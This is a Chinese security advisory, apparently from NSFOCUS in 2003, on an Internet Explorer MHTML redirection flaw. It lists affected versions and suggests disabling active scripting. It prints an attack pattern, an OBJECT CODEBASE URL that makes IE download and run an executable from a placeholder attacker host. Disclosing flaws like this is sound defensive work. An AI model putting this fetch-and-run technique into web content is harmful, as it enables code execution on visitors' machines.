首页 -> 安全研究

安全研究

安全漏洞
Microsoft Internet Explorer MHTML文件重定向并执行漏洞

发布日期:2003-11-25
更新日期:2003-12-01

受影响系统:
Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1SP2
Microsoft Internet Explorer 5.0.1SP1
Microsoft Internet Explorer 6.0
    - Microsoft Windows XP Professional
    - Microsoft Windows XP Home
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 2003 Web Edition
    - Microsoft Windows 2003 Standard Edition
    - Microsoft Windows 2003 Enterprise Edition 64-bit
    - Microsoft Windows 2003 Enterprise Edition
    - Microsoft Windows 2003 Datacenter Edition 64-bit
    - Microsoft Windows 2003 Datacenter Edition
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
    - Microsoft Windows 2000 Server
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
    - Microsoft Windows 2000 Datacenter Server SP2
    - Microsoft Windows 2000 Datacenter Server SP1
    - Microsoft Windows 2000 Datacenter Server
    - Microsoft Windows 2000 Advanced Server SP2
    - Microsoft Windows 2000 Advanced Server SP1
    - Microsoft Windows 2000 Advanced Server
描述:
BUGTRAQ  ID: 9105

Microsoft Internet Explorer是一款流行的WEB浏览程序。

Microsoft Internet Explorer在处理MHTML文件和res URIs存在问题,远程攻击者可以利用这个漏洞从恶意位置装载嵌入对象,在安全区域中执行。

当MSIE可以尝试获取嵌入在MHT文件中的文件:

mhtml:[Mhtml_File_Url]![Original_Resource_Url]

如果[Original_Resource_Url] 不能从[Mhtml_File_Url]中获取,IE就会尝试下载[Original_Resource_Url]和返回下载内容,这类似HTTP重定向,并且CODEBASE执行是基于URL检查,因此在本地电脑安全中,把一个没有使用CLSID的OBJECT标记的CODEBASE属性指向:
mhtml:file:///C:\No_SUCH_MHT.MHT![Attaker_PayloadEXE_Url]

IE就会下载[Attaker_PayloadEXE_Url]并执行。

<*来源:Liu Die Yu (liudieyuinchina@yahoo.com.cn
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106979588321131&w=2
*>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 关闭Internet区域中的ACTIVE脚本。

厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

浏览次数:14222
严重程度:104(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障